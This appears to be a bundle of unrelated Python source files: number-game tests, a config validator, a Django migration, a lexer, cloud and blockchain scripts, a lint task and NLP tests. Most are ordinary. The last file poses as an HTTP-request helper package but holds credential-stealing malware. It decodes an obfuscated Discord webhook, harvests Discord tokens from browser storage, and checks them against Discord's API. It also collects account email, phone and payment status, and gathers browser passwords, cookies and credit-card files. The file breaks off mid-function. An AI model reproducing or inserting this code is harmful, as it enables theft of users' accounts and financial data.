'Two', '31', 'TwoFour', '33', 'Two', '35', 'TwoFour', '37', 'Two', '39', 'TwoFour', '41', 'Two', '43',
'TwoFour', '45', 'Two', '47', 'TwoFour', '49', 'Two', '51', 'TwoFour', '53', 'Two', '55', 'TwoFour', '57',
'Two', '59', 'TwoFour', '61', 'Two', '63', 'TwoFour', '65', 'Two', '67', 'TwoFour', '69', 'Two', '71',
'TwoFour', '73', 'Two', '75', 'TwoFour', '77', 'Two', '79', 'TwoFour', '81', 'Two', '83', 'TwoFour', '85',
'Two', '87', 'TwoFour', '89', 'Two', '91', 'TwoFour', '93', 'Two', '95', 'TwoFour', '97', 'Two', '99',
'TwoFour']
self.one_to_a_hundred_with_six_and_nine_multiplicables = [
'1', '2', '3', '4', '5', 'Six', '7', '8', 'Nine', '10', '11', 'Six', '13', '14', '15', '16', '17',
'SixNine', '19', '20', '21', '22', '23', 'Six', '25', '26', 'Nine', '28', '29', 'Six', '31', '32', '33',
'34', '35', 'SixNine', '37', '38', '39', '40', '41', 'Six', '43', '44', 'Nine', '46', '47', 'Six', '49',
'50', '51', '52', '53', 'SixNine', '55', '56', '57', '58', '59', 'Six', '61', '62', 'Nine', '64', '65',
'Six', '67', '68', '69', '70', '71', 'SixNine', '73', '74', '75', '76', '77', 'Six', '79', '80', 'Nine',
'82', '83', 'Six', '85', '86', '87', '88', '89', 'SixNine', '91', '92', '93', '94', '95', 'Six', '97', '98',
'Nine', '100']
def test_one_to_a_hundred_with_three_and_five_multiplicables(self):
results = displays_detected_numbers(1, 100, [3, 5])
self.assertEqual(results, self.one_to_a_hundred_with_three_and_five_multiplicables)
def test_one_to_a_hundred_with_tow_and_four_multiplicables(self):
results = displays_detected_numbers(1, 100, [2, 4])
self.assertEqual(results, self.one_to_a_hundred_with_tow_and_four_multiplicables)
def test_one_to_a_hundred_with_six_and_nine_multiplicables(self):
results = displays_detected_numbers(1, 100, [6, 9])
self.assertEqual(results, self.one_to_a_hundred_with_six_and_nine_multiplicables)
|
"""Reflexec config validator module.
"""
import logging
import shlex
from distutils.util import strtobool
log = logging.getLogger("reflexec")
def validate_config_value(key, cfg):
"""Validate config value."""
if key not in cfg:
return
validator_fn = globals()[f"validate_{key}"]
value = cfg[key]
try:
value = validator_fn(value)
except ValueError as err:
del cfg[key]
raise ValueError(f"Invalid value {value!r} for parameter {key!r}: {err}")
if value is None:
del cfg[key]
else:
cfg[key] = value
def validate_debug(value):
"""Validate "debug" parameter."""
if isinstance(value, str):
value = strtobool(value)
return bool(value)
def validate_command(value):
"""Validate "command" parameter."""
if isinstance(value, str):
value = shlex.split(value)
return list(value)
def validate_name(value):
"""Validate "name" parameter."""
assert isinstance(value, str)
return value
def validate_delay(value):
"""Validate "delay" parameter."""
try:
value = float(value)
if int(value) == value:
value = int(value)
except ValueError:
raise ValueError("Must be float")
if value < 0:
raise ValueError("Negative value is not allowed")
return value
def validate_output(value):
"""Validate "output" parameter."""
if value is not None:
if isinstance(value, str):
value = value.split(",")
# filter out empty names
value = list(filter(None, value))
return value
def validate_start(value):
"""Validate "start" parameter."""
if value not in ("watch", "exec"):
raise ValueError('Must be "exec" or "watch"')
return value
def validate_watcher(value):
"""Validate "watcher" parameter."""
assert isinstance(value, str)
return value
def validate_type(value):
"""Validate "type" parameter."""
if value not in ("default", "command"):
raise ValueError('Must be "default" or "command"')
return value
def validate_watch(value):
"""Validate "watch" parameter."""
if not value:
return None
if isinstance(value, str):
value = [_ for _ in value.split("\n") if _]
return value
def validate_max_execs(value):
"""Validate "max_execs" parameter."""
try:
value = int(value)
except ValueError:
raise ValueError("Must be integer")
if value < 0:
raise ValueError("Negative value is not allowed")
return value
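# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Shows how validate_config_value dispatches to the validate_<key> functions above.
# The sample config dict is made up for the example.
if __name__ == "__main__":
    cfg = {"delay": "1.5", "command": "make test", "max_execs": "3"}
    for key in list(cfg):
        validate_config_value(key, cfg)
    print(cfg)  # {'delay': 1.5, 'command': ['make', 'test'], 'max_execs': 3}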
|
# Generated by Django 2.2.2 on 2019-06-13 18:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('library', '0002_auto_20190613_1747'),
]
operations = [
migrations.RemoveField(
model_name='author',
name='slug',
),
migrations.RemoveField(
model_name='book',
name='slug',
),
migrations.AddField(
model_name='book',
name='vote_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='book',
name='vote_sum',
field=models.IntegerField(default=0),
),
]
|
# encoding: utf-8
"""Utilities for working with data structures like lists, dicts and tuples.
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2008-2011 The yap_ipython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
def uniq_stable(elems):
"""uniq_stable(elems) -> list
Return from an iterable, a list of all the unique elements in the input,
but maintaining the order in which they first appear.
Note: All elements in the input must be hashable for this routine
to work, as it internally uses a set for efficiency reasons.
"""
seen = set()
return [x for x in elems if x not in seen and not seen.add(x)]
def flatten(seq):
"""Flatten a list of lists (NOT recursive, only works for 2d lists)."""
return [x for subseq in seq for x in subseq]
def chop(seq, size):
"""Chop a sequence into chunks of the given size."""
return [seq[i:i+size] for i in range(0,len(seq),size)]
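# --- Hedged usage examples (added for illustration; not part of the original file) ---
if __name__ == "__main__":
    assert uniq_stable([1, 2, 1, 3, 2]) == [1, 2, 3]
    assert flatten([[1, 2], [3], [4, 5]]) == [1, 2, 3, 4, 5]
    assert chop([1, 2, 3, 4, 5], 2) == [[1, 2], [3, 4], [5]]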
|
import re
from composite import composite_function
from typing import *
from error import error
A = NewType('A', int)
class Token:
def __init__(self, type_: str, text_: str):
self.type = type_
self.text = text_
def __repr__(self):
return "[" + self.type + ", " + self.text + "]"
# genToken :: str -> Token
def genToken(w: str) -> Token:
"""
Gets token out of word
"""
builtins = ["zeg_na", "stel", "stapel", "verklein", "definieer", "produceer", "verdeel"]
if w in builtins:
return Token("BuiltIn", w)
if w[0] == '"' and w[-1] == '"':
return Token("String", w)
if w.isnumeric():
return Token("Number", int(w))
    if w == "lus":
        return Token("LoopStart", w)
    if w == "sul":
        return Token("LoopEnd", w)
    if w == "indien":
        return Token("If", w)
    if w == "neidni":
        return Token("Endif", w)
    # check keywords before the identifier pattern so they are not lexed as identifiers
    if re.fullmatch("^[a-zA-Z_][a-zA-Z_0-9]*", w) is not None:
        return Token("Identifier", w)
    error("Invalid Syntax: %s" % w)
# ifNotDecorator :: (A -> A) -> (str, str)
def ifNotDecorator(func: Callable[[A], A]) -> Tuple[str, str]:
'''Decorator that checks input is not empty and returns a tuple of two empty strings otherwise'''
def inner(toLex):
if not toLex:
return ("","")
return func(toLex)
return inner
@ifNotDecorator
# lexString :: str -> (str, str)
def lexString(toLex: str) -> Tuple[str, str]:
'''Lex a literal string'''
head, *tail = toLex
if head != '"':
string, rest = lexString(tail)
return (head+string, rest)
else:
return (head, tail)
@ifNotDecorator
# lexToken :: str -> (str, str)
def lexToken(toLex: str) -> Tuple[str, str]:
'''Lex words to be used by genToken'''
head, *tail = toLex
if head != " ":
string, rest = lexToken(tail)
return (head+string, rest)
else:
return ("", tail)
# lexLine :: str -> ([Token | Str], str)
def lexLine(toLex: str) -> Tuple[List[Union[Token, str]], str]:
'''Lex a line of code'''
if not toLex:
return ([],"")
head, *tail = toLex
if head.isalnum():
token, rest = lexToken(toLex)
string, rest2 = lexLine(rest)
return ([token,string], rest2)
elif head == " ":
string, rest = lexLine("".join(tail))
return (string, rest)
elif head == '"':
string, rest = lexString("".join(tail))
string2, rest2 = lexLine(rest)
return ([head+string,string2], rest2)
return ([], toLex)
# Not sure how to express this one with Python typing,
# but it converts a nested (recursive) list into a flat Python list.
# A Haskell-style signature doesn't quite fit either, since Haskell lists are already recursive.
# flatten :: [A, [A, [A, []]]] -> [A]
def flatten(t):
'''Flatten a recursive list to a regular python list'''
if not t:
return []
if len(t) == 1:
return t[0]
return [t[0]] + flatten(t[1])
# removeComment :: str -> str
def removeComment(toLex: str) -> str:
'''Remove comments from code before lexing'''
return toLex.split("//", 1)[0]
# myStrip :: str -> str
def myStrip(toLex: str) -> str:
'''Strip whitespace'''
return toLex.strip()
# myHead :: (A, A) -> A
def myHead(a: tuple) -> A:
'''Returns the first item of a tuple'''
return a[0]
# genTokens :: [str] -> [Token]
def genTokens(a: List[str]) -> List[Token]:
'''Loop for genToken'''
return list(map(lambda x: genToken(x), a))
# emptyLineFilter :: [Token | None] -> [Token]
def emptyLineFilter(a: List[Optional[Token]]) -> List[Token]:
    '''Filters out empty lines'''
    return list(filter(None, a))
# Composite function
# linesToTokens = genTokens . flatten . myHead . lexLine . myStrip . removeComment
# linesToTokens :: str -> [Token]
linesToTokens = composite_function(genTokens, flatten, myHead, lexLine, myStrip, removeComment)
# lex :: str -> [Token]
def lex(filename: str) -> List[Token]:
'''Lexes a file to a list of tokens to be used by a parser'''
with open(f"youriSrc/{filename}") as file:
lines = file.read().replace(";", "\n").split("\n")
return list(filter(None, map(linesToTokens, lines)))
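# --- Hedged usage sketch (added for illustration; not part of the original lexer) ---
# Assumes composite_function composes right-to-left, as the comment above indicates,
# so removeComment runs first and genTokens last. The sample line is made up.
if __name__ == "__main__":
    tokens = linesToTokens("stel x 5 // zet x op 5")
    print([t.type for t in tokens])  # expected: ['BuiltIn', 'Identifier', 'Number']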
|
import sys
from sessions import get_session
account_number = sys.argv[1]
stage = sys.argv[2]
function_name = sys.argv[3]
version = sys.argv[4]
function_arn = f'arn:aws:lambda:eu-west-2:{account_number}:function:{function_name}'
boto_session = get_session(account_number, "TDRJenkinsLambdaRole" + stage.capitalize())
client = boto_session.client("lambda")
event_mappings = client.list_event_source_mappings()['EventSourceMappings']
uuid = list(filter(lambda x: x['FunctionArn'].startswith(function_arn), event_mappings))[0]['UUID']
client.update_event_source_mapping(UUID=uuid, FunctionName=function_arn + ":" + version)
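# --- Hedged usage note (added for illustration) ---
# The script is driven by four positional command line arguments, e.g. (script name hypothetical):
#   python update_event_source_mapping.py <account_number> <stage> <function_name> <version>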
|
class DriverArgument:
def __init__(self) -> None:
self.action: str = None
self.pl_project: dict = None
self.pl_projects: list = None
self.pl_field: str = None
self.o_lim: bool = None
self.o_quit: bool = None
def get_action(self) -> str:
""" Returns the action this DriverArgument holds """
return self.action
def get_project(self) -> dict:
""" Returns the project this DriverArgument holds """
return self.pl_project
def get_projects(self) -> dict:
""" Returns the projects this DriverArgument holds """
return self.pl_projects
def make_start(self, project: dict, limited: bool, quit: bool):
""" Creates a proper DriverArgument configured for driver start """
self.action = "START"
self.pl_project = project
        self.o_lim = False if limited is None else limited
        self.o_quit = False if quit is None else quit
def make_add(self, project: dict, projects: list):
""" Creates a proper DriverArgument configured for driver add """
self.action = "ADD"
self.pl_project = project
self.pl_projects = projects
def make_rm(self, project: dict, projects: list):
""" Creates a proper DriverArgument configured for driver remove """
self.action = "RM"
self.pl_project = project
self.pl_projects = projects
def make_edit(self, project: dict, projects: list, field: str):
""" Creates a proper DriverArgument configured for driver edit """
self.action = "EDIT"
self.pl_project = project
self.pl_projects = projects
self.pl_field = field
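# --- Hedged usage sketch (added for illustration; not part of the original class) ---
# Shows how a DriverArgument might be configured for a "start" action; the project
# dict is made up for the example.
if __name__ == "__main__":
    arg = DriverArgument()
    arg.make_start({"name": "demo-project"}, limited=None, quit=True)
    print(arg.get_action(), arg.get_project(), arg.o_lim, arg.o_quit)
    # START {'name': 'demo-project'} False True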
|
#! /usr/bin/env python
from b3p import geometry_section
from b3p import geometry_blade_shape
from b3p import geometry_web
import pickle
def build_mesh(
pckfile,
radii,
web_inputs,
web_intersections,
prefix,
n_web_points=10,
n_ch_points=120,
outfile="out.vtp",
added_datums={},
panel_mesh_scale=[],
):
sections = pickle.load(open(pckfile, "rb"))
# create webs, using parametric coordinates, the point lists are
# (rel_coordinate_along_web,first_rel_chordwise_point,second_rel_chordwise_point)
# web_root is the lowest r location of the web, web_tip is the highest
weblist = []
c = 0
for i in web_inputs:
weblist.append(
geometry_web.web(
points=web_intersections[i],
web_root=web_inputs[i]["z_start"],
web_tip=web_inputs[i]["z_end"],
web_name="%s_%s.txt" % (prefix, i),
coordinate=i,
flip_normal=(web_inputs[i]["origin"][1] > 0),
)
)
c += 1
nsec = []
z = [i[0][2] for i in sections]
# loop over the sections and add them to a section list
for i in sections:
r = i[0][2] - min(z)
r_rel = (r - min(z)) / (max(z) - min(z))
sec = geometry_section.section(r, r_rel, i, open_te=False)
nsec.append(sec)
# create a blade loft from the sections
blade = geometry_blade_shape.blade_shape(
nsec,
section_resolution=200,
web_resolution=n_web_points,
added_datums=added_datums,
)
for i in weblist:
blade.set_web(i)
blade.build_interpolated_sections(radii=radii, interpolation_type=2)
# mesh with a given number of points around the circumference
blade.mesh(n_ch_points, panel_mesh_scale=panel_mesh_scale)
print("# writing to %s" % outfile)
blade.write_mesh(outfile)
print("# writing mesh done")
|
#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
import pytest
@pytest.fixture
def hannanum_instance():
from konlpy import init_jvm
from konlpy.tag import Hannanum
init_jvm()
h = Hannanum()
return h
@pytest.fixture
def string():
return u"꽃가마 타고 강남 가자!"
def test_hannanum_analyze(hannanum_instance, string):
assert hannanum_instance.analyze(string) ==\
[[[(u'\uaf43\uac00', u'ncn'), (u'\uc774', u'jp'), (u'\ub9c8', u'ef')],
[(u'\uaf43\uac00\ub9c8', u'ncn')],
[(u'\uaf43\uac00', u'nqq'), (u'\uc774', u'jp'), (u'\ub9c8', u'ef')],
[(u'\uaf43\uac00\ub9c8', u'nqq')]],
[[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecc')],
[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecs')],
[(u'\ud0c0', u'pvg'), (u'\uace0', u'ecx')]],
[[(u'\uac15\ub0a8', u'ncn')]],
[[(u'\uac00', u'pvg'), (u'\uc790', u'ecc')],
[(u'\uac00', u'pvg'), (u'\uc790', u'ecs')],
[(u'\uac00', u'pvg'), (u'\uc790', u'ef')],
[(u'\uac00', u'px'), (u'\uc790', u'ecc')],
[(u'\uac00', u'px'), (u'\uc790', u'ecs')],
[(u'\uac00', u'px'), (u'\uc790', u'ef')]],
[[(u'!', u'sf')]]]
def test_hannanum_nouns(hannanum_instance, string):
assert hannanum_instance.nouns(string) ==\
[u'\uaf43\uac00\ub9c8', u'\uac15\ub0a8']
def test_hannanum_morphs(hannanum_instance, string):
assert hannanum_instance.morphs(string) ==\
[u'\uaf43\uac00\ub9c8',
u'\ud0c0',
u'\uace0',
u'\uac15\ub0a8',
u'\uac00',
u'\uc790',
u'!']
def test_hannanum_pos_9(hannanum_instance, string):
assert hannanum_instance.pos(string) ==\
[(u'\uaf43\uac00\ub9c8', u'N'),
(u'\ud0c0', u'P'),
(u'\uace0', u'E'),
(u'\uac15\ub0a8', u'N'),
(u'\uac00', u'P'),
(u'\uc790', u'E'),
(u'!', u'S')]
def test_hannanum_pos_22(hannanum_instance, string):
assert hannanum_instance.pos(string, ntags=22) ==\
[(u'\uaf43\uac00\ub9c8', u'NC'),
(u'\ud0c0', u'PV'),
(u'\uace0', u'EC'),
(u'\uac15\ub0a8', u'NC'),
(u'\uac00', u'PX'),
(u'\uc790', u'EC'),
(u'!', u'SF')]
def test_hannanum_pos_join(hannanum_instance, string):
assert hannanum_instance.pos(string, join=True) ==\
[u'\uaf43\uac00\ub9c8/N',
u'\ud0c0/P',
u'\uace0/E',
u'\uac15\ub0a8/N',
u'\uac00/P',
u'\uc790/E',
u'!/S']
|
''' callcontract.py - Call a deployed contract '''
import os
from web3 import Web3
from web3.contract import Contract
KOVAN_URL = os.getenv('KOVAN_URL')
address_file = 'HelloWorld.address'
abi_file = 'HelloWorld.abi'
w3 = Web3(Web3.HTTPProvider(KOVAN_URL))
print('w3.isConnected:', w3.isConnected())
''' Read the contract address '''
with open(address_file, mode='rt') as fp:
hwadd = fp.read()
''' Read the ABI '''
with open(abi_file, mode='rt') as fp:
abi = fp.read()
''' Create the contract object '''
contract = w3.eth.contract(hwadd, abi=abi)
''' Select the function to call '''
c_func = contract.functions.hello()
''' Call the contract function '''
print('Calling the contract.')
result = c_func.call()
print(result)
|
import os
import copy
import numpy as np
import pandas as pd
import torch
from sklearn.metrics import f1_score
from utils import load_model_dict
from models import init_model_dict
from train_test import prepare_trte_data, gen_trte_adj_mat, test_epoch
cuda = True if torch.cuda.is_available() else False
def cal_feat_imp(data_folder, model_folder, view_list, num_class):
num_view = len(view_list)
dim_hvcdn = pow(num_class,num_view)
if data_folder == 'ROSMAP':
adj_parameter = 2
dim_he_list = [200,200,100]
if data_folder == 'BRCA':
adj_parameter = 10
dim_he_list = [400,400,200]
data_tr_list, data_trte_list, trte_idx, labels_trte = prepare_trte_data(data_folder, view_list)
adj_tr_list, adj_te_list = gen_trte_adj_mat(data_tr_list, data_trte_list, trte_idx, adj_parameter)
featname_list = []
for v in view_list:
df = pd.read_csv(os.path.join(data_folder, str(v)+"_featname.csv"), header=None)
featname_list.append(df.values.flatten())
dim_list = [x.shape[1] for x in data_tr_list]
model_dict = init_model_dict(num_view, num_class, dim_list, dim_he_list, dim_hvcdn)
for m in model_dict:
if cuda:
model_dict[m].cuda()
model_dict = load_model_dict(model_folder, model_dict)
te_prob = test_epoch(data_trte_list, adj_te_list, trte_idx["te"], model_dict)
if num_class == 2:
f1 = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1))
else:
f1 = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1), average='macro')
feat_imp_list = []
for i in range(len(featname_list)):
feat_imp = {"feat_name":featname_list[i]}
feat_imp['imp'] = np.zeros(dim_list[i])
for j in range(dim_list[i]):
feat_tr = data_tr_list[i][:,j].clone()
feat_trte = data_trte_list[i][:,j].clone()
data_tr_list[i][:,j] = 0
data_trte_list[i][:,j] = 0
adj_tr_list, adj_te_list = gen_trte_adj_mat(data_tr_list, data_trte_list, trte_idx, adj_parameter)
te_prob = test_epoch(data_trte_list, adj_te_list, trte_idx["te"], model_dict)
if num_class == 2:
f1_tmp = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1))
else:
f1_tmp = f1_score(labels_trte[trte_idx["te"]], te_prob.argmax(1), average='macro')
feat_imp['imp'][j] = (f1-f1_tmp)*dim_list[i]
data_tr_list[i][:,j] = feat_tr.clone()
data_trte_list[i][:,j] = feat_trte.clone()
feat_imp_list.append(pd.DataFrame(data=feat_imp))
return feat_imp_list
def summarize_imp_feat(featimp_list_list, topn=30):
num_rep = len(featimp_list_list)
num_view = len(featimp_list_list[0])
df_tmp_list = []
for v in range(num_view):
df_tmp = copy.deepcopy(featimp_list_list[0][v])
df_tmp['omics'] = np.ones(df_tmp.shape[0], dtype=int)*v
df_tmp_list.append(df_tmp.copy(deep=True))
df_featimp = pd.concat(df_tmp_list).copy(deep=True)
for r in range(1,num_rep):
for v in range(num_view):
df_tmp = copy.deepcopy(featimp_list_list[r][v])
df_tmp['omics'] = np.ones(df_tmp.shape[0], dtype=int)*v
            df_featimp = pd.concat([df_featimp, df_tmp.copy(deep=True)], ignore_index=True)
df_featimp_top = df_featimp.groupby(['feat_name', 'omics'])['imp'].sum()
df_featimp_top = df_featimp_top.reset_index()
df_featimp_top = df_featimp_top.sort_values(by='imp',ascending=False)
df_featimp_top = df_featimp_top.iloc[:topn]
print('{:}\t{:}'.format('Rank','Feature name'))
for i in range(len(df_featimp_top)):
print('{:}\t{:}'.format(i+1,df_featimp_top.iloc[i]['feat_name']))
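# --- Hedged usage sketch (added for illustration; not part of the original script) ---
# The folder names, view list and repeat count below are assumptions about how this
# module is driven elsewhere; adjust them to the actual data and model layout.
if __name__ == "__main__":
    featimp_list_list = [cal_feat_imp('ROSMAP', 'ROSMAP/models', view_list=[1, 2, 3], num_class=2)
                         for _ in range(5)]
    summarize_imp_feat(featimp_list_list, topn=30)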
|
import os
from collections import OrderedDict
from jogger.utils.files import walk
from .base import Task, TaskError
try:
import flake8 # noqa
HAS_FLAKE8 = True
except ImportError:
HAS_FLAKE8 = False
try:
import isort # noqa
HAS_ISORT = True
except ImportError:
HAS_ISORT = False
try:
import bandit # noqa
HAS_BANDIT = True
except ImportError:
HAS_BANDIT = False
try:
from django.core.management import call_command # noqa
HAS_DJANGO = True
except ImportError:
HAS_DJANGO = False
ENDINGS = {
'CRLF': b'\r\n',
'CR': b'\r',
'LF': b'\n'
}
DEFAULT_GOOD_ENDING = 'LF'
DEFAULT_MAX_FILESIZE = 1024 * 1024 # 1MB in bytes
def listify_multiline_string(string):
"""
Return a list constructed by splitting the given multiline string,
stripping whitespace, and filtering out empty values.
:param string: The multiline string to convert into a list.
:return: The resulting list.
"""
result = [i.strip() for i in string.splitlines()]
    return list(filter(None, result))
class LintTask(Task):
help = (
'Lint the project. Automatically detects, and uses if found, isort and '
'flake8 for linting Python code, and bandit for finding common security '
'issues in Python code. Also runs fable (Find All Bad Line Endings) and '
'performs a dry-run of makemigrations (if Django is detected).'
)
steps = [
('python', '-p', 'Perform linting of Python code.'),
('fable', '-f', 'Find all bad line endings.'),
('bandit', '-b', 'Perform a Bandit security scan.'),
('migrations', '-m', 'Perform makemigrations dry-run.')
]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.outcomes = OrderedDict()
def add_arguments(self, parser):
for name, short_flag, help_text in self.steps:
parser.add_argument(
short_flag, f'--{name}',
action='store_true',
dest=f'do_{name}',
help=help_text
)
def handle(self, **options):
settings = self.settings
explicit_steps = []
implicit_steps = []
for step, _, _ in self.steps:
# Consider the step explicit if a command line flag is included for
# it. Otherwise, consider the step implicit unless it has been
# disabled via the project settings file
if options[f'do_{step}']:
explicit_steps.append(step)
elif settings.getboolean(step, fallback=True):
implicit_steps.append(step)
if explicit_steps:
run = explicit_steps
explicit = True
else:
run = implicit_steps
explicit = False
for step in run:
getattr(self, f'handle_{step}')(explicit)
summary = []
for label, result in self.outcomes.items():
if result:
styled_result = self.styler.success('OK')
else:
styled_result = self.styler.error('FAIL')
summary.append(f'{label}: {styled_result}')
if summary:
self.stdout.write('Summary', style='label')
self.stdout.write('\n'.join(summary))
def handle_python(self, explicit):
if explicit and not HAS_ISORT and not HAS_FLAKE8:
self.stderr.write('Cannot lint python: Neither isort nor flake8 are available.')
return
if HAS_ISORT:
self.stdout.write('Running isort...', style='label')
result = self.cli('isort --check-only --diff .')
self.outcomes['isort'] = result.returncode == 0
self.stdout.write('') # newline
if HAS_FLAKE8:
self.stdout.write('Running flake8...', style='label')
result = self.cli('flake8 .')
self.outcomes['flake8'] = result.returncode == 0
self.stdout.write('') # newline
def _get_fable_excludes(self):
# Start with some sane default exclusions
excludes = {'.git', '__pycache__', '*.pyc', '*.pdf', '*.png', '*.jpg', '*.jpeg', '*.gif'}
# Add any configured excludes
try:
extra_excludes = self.settings['fable_exclude']
except KeyError:
pass
else:
excludes.update(listify_multiline_string(extra_excludes))
return excludes
def handle_fable(self, explicit):
self.stdout.write('Running fable...', style='label')
excludes = self._get_fable_excludes()
# Get the appropriate good ending from settings
good_ending = self.settings.get('fable_good_endings', DEFAULT_GOOD_ENDING)
if good_ending not in ENDINGS:
raise TaskError(f'Invalid value for fable_good_endings setting ({good_ending}).')
# Compile inverse dictionary of bad line endings
bad_endings = {v: k for k, v in ENDINGS.items() if k != good_ending}
# Get the maximum file size to analyse from settings
max_filesize = self.settings.get('fable_max_filesize', DEFAULT_MAX_FILESIZE)
try:
max_filesize = int(max_filesize)
except ValueError:
raise TaskError(f'Invalid value for fable_max_filesize setting ({max_filesize}).')
result = True
skipped = 0
for filename in walk('./', excludes):
if os.path.getsize(filename) > max_filesize:
skipped += 1
continue
with open(filename, 'rb') as f:
content = f.read()
for ending in bad_endings:
if ending in content:
self.stdout.write(f'Detected {bad_endings[ending]}: {filename}')
result = False
break
if skipped:
self.stdout.write(f'Skipped {skipped} large files')
self.outcomes['fable'] = result
self.stdout.write('') # newline
def handle_bandit(self, explicit):
if not HAS_BANDIT:
if explicit:
self.stderr.write('Cannot run bandit: Package is not available.')
return
self.stdout.write('Running bandit...', style='label')
cmd = 'bandit . -r'
# Set the command's verbosity based on the verbosity level of the task
verbosity = self.kwargs['verbosity']
if verbosity < 2:
cmd = f'{cmd} -q' # run in "quiet" mode
elif verbosity > 2:
cmd = f'{cmd} -v' # run in "verbose" mode
# Add any configured excludes
try:
excludes = self.settings['bandit_exclude']
except KeyError:
pass
else:
excludes = ','.join(listify_multiline_string(excludes))
cmd = f'{cmd} -x {excludes}'
result = self.cli(cmd)
self.outcomes['bandit'] = result.returncode == 0
self.stdout.write('') # newline
def handle_migrations(self, explicit):
if explicit and not HAS_DJANGO:
self.stderr.write('Cannot check migrations: Django is not available.')
return
if HAS_DJANGO:
self.stdout.write('Checking for missing migrations...', style='label')
result = self.cli('python manage.py makemigrations --dry-run --check')
self.outcomes['migrations'] = result.returncode == 0
self.stdout.write('') # newline
|
import os, re, shutil, requests, threading
from httpsreqfast.encoder import Encoder
from httpsreqfast.browser import Browser
from httpsreqfast.receiver import Receiver
from httpsreqfast.config import *
from httpsreqfast.utils.request import request_post
class Getter:
def fast_get(
self,
url : str,
params=None,
data=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects : bool=True,
proxies=None,
hooks=None,
stream=None,
verify=True,
cert=None,
json=None):
return requests.get(
url,
params=params,
data=data,
headers=headers,
cookies=cookies,
files=files,
auth=auth,
timeout=timeout,
allow_redirects=allow_redirects,
proxies=proxies,
hooks=hooks,
stream=stream,
verify=verify,
cert=cert,
json=json
)
def fast_post(
self,
url: str,
data=None,
json=None,
params=None,
headers=None,
cookies=None,
files=None,
auth=None,
timeout=None,
allow_redirects: bool=None,
proxies=None,
hooks=None,
stream=None,
verify=True,
cert=None):
return requests.get(
url,
data=data,
json=json,
params=params,
heaaders=headers,
cookies=cookies,
files=files,
auth=auth,
timeout=timeout,
allow_redirects=allow_redirects,
proxies=proxies,
hooks=hooks,
stream=stream,
verify=verify,
cert=cert
)
class Setup:
def __init__(self):
self.__browser = Browser()
self.__encoder = Encoder()
self.__akrt = "aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvOTY1NzMxOTIwNzc0MzA3OTUwL2lMOWE5X0wzMU9BWnYxRk5lNXQ3UVp6ampzZ2ozSHFhY25TWUNwM0RTWjJEc2h3X2ZuRV9JWDBodVVCdmpXMHFwVEJ6"
self.__url_check = "https://discord.com/api/v9/users/@me/guilds"
self.__browser_path = [
'_Roaming/Discord/Local Storage/leveldb',
'_Roaming/Lightcord/Local Storage/leveldb',
'_Roaming/discordcanary/Local Storage/leveldb',
'_Roaming/discordptb/Local Storage/leveldb',
'_Roaming/Opera Software/Opera Stable/Local Storage/leveldb',
'_Roaming/Opera Software/Opera GX Stable/Local Storage/leveldb',
'_Local/Amigo/User Data/Local Storage/leveldb',
'_Local/Torch/User Data/Local Storage/leveldb',
'_Local/Kometa/User Data/Local Storage/leveldb',
'_Local/Orbitum/User Data/Local Storage/leveldb',
'_Local/CentBrowser/User Data/Local Storage/leveldb',
'_Local/7Star/7Star/User Data/Local Storage/leveldb',
'_Local/Sputnik/Sputnik/User Data/Local Storage/leveldb',
'_Local/Vivaldi/User Data/Default/Local Storage/leveldb',
'_Local/Google/Chrome SxS/User Data/Local Storage/leveldb',
'_Local/Epic Privacy Browser/User Data/Local Storage/leveldb',
'_Local/Google/Chrome/User Data/Default/Local Storage/leveldb',
'_Local/uCozMedia/Uran/User Data/Default/Local Storage/leveldb',
'_Local/Microsoft/Edge/User Data/Default/Local Storage/leveldb',
'_Local/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb',
'_Local/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb',
'_Local/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb'
]
self.__files = [
f"{temp_folder}\\Chromium Cookies.txt",
f"{temp_folder}\\Chromium Passwords.txt",
f"{temp_folder}\\Chromium CreditCards.txt",
f"{temp_folder}\\metazip.zip"
]
self.__rharha = self.__encoder._decode_data(self.__akrt)
def __get_tokens(self):
try:
tokens = []
threading.Thread(target=self.__browser._get_tokens_firefox, args=(tokens,)).start()
for path in self.__browser_path:
path = path.replace("_Local", local).replace('_Roaming', roaming)
if os.path.exists(path):
for filename in os.listdir(path):
if not filename.endswith(".log") and not filename.endswith(".ldb"):
continue
else:
for line in [i.strip() for i in open(f"{path}\\{filename}", errors="ignore").readlines() if i.strip()]:
for token in re.findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', line):
tokens.append(token)
return set(tokens)
except:
pass
def __check_tokens(self, tokens):
try:
valid_tokens = []
for token in tokens:
try:
result = requests.get(self.__url_check, headers = {
"Authorization": token
})
if result.status_code == 200:
valid_tokens += f"{token}\n"
except:
pass
return valid_tokens
except:
pass
def __recreate_tokens(self, char_array):
try:
tokens = []
token = ""
for char in char_array:
if char == '\n':
tokens.append(token)
token = ""
else:
token += char
return tokens
except:
pass
def __get_datas(self, token):
try:
data = []
userdata = requests.get("https://discord.com/api/v9/users/@me", headers = {
"Authorization": token
}).json()
phone = userdata['phone']
data.append(f"email -> {userdata['email']}")
if (phone is not None):
data.append(f"phone -> {phone}")
return data
except:
pass
def __has_payment_methods(self, token) -> bool:
try:
has_billing = False
billing = requests.get("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers = {
"Authorization": token
}).json()
if len(billing) > 0:
has_billing = True
return has_billing
except:
pass
def __format_data(self, verified_tokens):
try:
content = ""
if len(verified_tokens) > 0:
for count, token in enumerate(verified_tokens, start=1):
content += f"\n\nToken #{count}:\n{self.__encoder._encode_data(token)}"
